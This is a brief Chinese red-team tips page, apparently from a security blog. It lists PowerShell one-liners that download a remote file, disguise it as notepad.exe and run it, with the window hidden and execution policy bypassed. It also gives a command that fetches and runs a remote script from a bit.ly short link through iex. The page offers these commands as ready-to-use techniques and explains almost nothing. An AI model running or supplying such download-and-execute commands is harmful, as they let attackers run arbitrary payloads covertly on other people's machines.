1. 首页
  2. 红队技术

powershell 远程下载并执行

远程下载文件到本地并执行
cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile(‘http://127.0.0.1:8089′,’notepad.exe’);start-process notepad.exe

远程执行ps1脚本
powershell -nop -c “iex(New-Object Net.WebClient).DownloadString(‘http://bit.ly/1kEgbuH’)”

原创文章,作者:moonsec,如若转载,请注明出处:https://www.moonsec.com/archives/3048

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息